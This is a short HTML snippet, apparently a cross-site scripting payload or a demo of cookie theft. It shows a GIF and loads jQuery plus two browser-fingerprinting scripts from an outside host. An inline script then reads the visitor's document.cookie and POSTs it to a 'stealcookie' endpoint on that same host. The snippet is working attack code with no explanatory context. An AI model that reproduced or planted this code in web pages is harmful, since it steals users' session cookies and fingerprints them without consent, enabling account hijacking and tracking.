<p>
  <img src="https://media.giphy.com/media/9fbYYzdf6BbQA/giphy.gif"
       alt="" style="width: 300px; height: 300px;">
</p>
<script src="https://code.jquery.com/jquery-3.1.1.min.js"></script>
<script src="http://t99.tech/dar/js/fingerprint.js"></script>
<script src="http://t99.tech/dar/js/canvasFingerprinting.js"></script>
<script>
  var cookie = encodeURI(document.cookie);

  $.post("http://t99.tech/dar/stealcookie", { cookie: cookie });
</script>
